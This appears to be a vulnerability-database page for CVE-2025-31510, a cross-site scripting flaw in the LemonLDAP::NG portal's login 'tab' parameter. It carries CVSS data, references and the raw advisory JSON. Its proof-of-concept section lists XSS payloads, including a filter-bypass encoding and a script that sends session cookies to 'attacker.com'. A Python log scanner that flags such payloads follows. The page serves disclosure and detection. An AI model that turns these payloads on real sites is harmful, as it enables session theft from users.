Security Vulnerability Report
CVE-2025-31510 CVSS 7.2 HIGH

CVE-2025-31510

Published: 2026-01-16 18:16:07
Last Modified: 2026-04-15 00:35:42

Description

In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LemonLDAP::NG < 2.21.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-31510 XSS PoC -->
<!-- LemonLDAP::NG Login Page tab Parameter XSS -->

<!-- Method 1: Via URL parameter -->
<!-- https://vulnerable-site/portal/login?tab=<script>alert(document.cookie)</script> -->

<!-- Method 2: Via form submission with encoded payload -->
<!-- tab parameter value: <img src=x onerror=alert('XSS')> -->

<!-- Real-world attack payload example -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  var attacker = 'https://attacker.com/steal?c=' + encodeURIComponent(cookies);
  new Image().src = attacker;
</script>

<!-- Encoded variant to bypass filters -->
<!-- tab=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E -->
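As an added defender-side example (not part of this report and not LemonLDAP::NG code), the following Python scans constructed web-server access-log lines for requests to the portal login page whose tab parameter carries HTML markup, decoding repeatedly so the encoded variants above are still caught; the log format, paths and IP addresses are assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2026:18:20:01 +0000] "GET /portal/login?tab=ldap HTTP/1.1" 200 5120
10.0.0.7 - - [16/Jan/2026:18:20:09 +0000] "GET /portal/login?tab=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5301
10.0.0.9 - - [16/Jan/2026:18:21:33 +0000] "GET /portal/login?tab=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E HTTP/1.1" 200 5299
10.0.0.5 - - [16/Jan/2026:18:22:40 +0000] "POST /portal/login HTTP/1.1" 302 0
"""

# Client IP, timestamp, method and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# A tab value selects an authentication module; it never legitimately contains markup.
MARKUP_RE = re.compile(r'<|>|on\w+\s*=|javascript:', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_tab_xss(log_text):
    """Return (ip, timestamp, decoded tab value) for login-page requests whose tab parameter carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/portal/login"):
            continue
        # parse_qs already decodes one layer; decode_fully handles any further layers.
        for tab in parse_qs(parts.query, keep_blank_values=True).get("tab", []):
            decoded = decode_fully(tab)
            if MARKUP_RE.search(decoded):
                hits.append((m.group("ip"), m.group("ts"), decoded))
    return hits


if __name__ == "__main__":
    for ip, ts, tab in find_tab_xss(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious tab={tab!r}")
```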

References

https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341
https://lists.debian.org/debian-lts-announce/2025/04/msg00017.html

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-31510",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T18:16:07.363",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication."},
      {"lang": "es", "value": "En el portal de LemonLDAP::NG anterior a la versión 2.21.0, cross-site scripting (XSS) permite a atacantes remotos inyectar scripts web o HTML arbitrarios (en la página de inicio de sesión) a través del parámetro tab, para la autenticación Choice."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "references": [
      {"url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341", "source": "[email protected]"},
      {"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00017.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}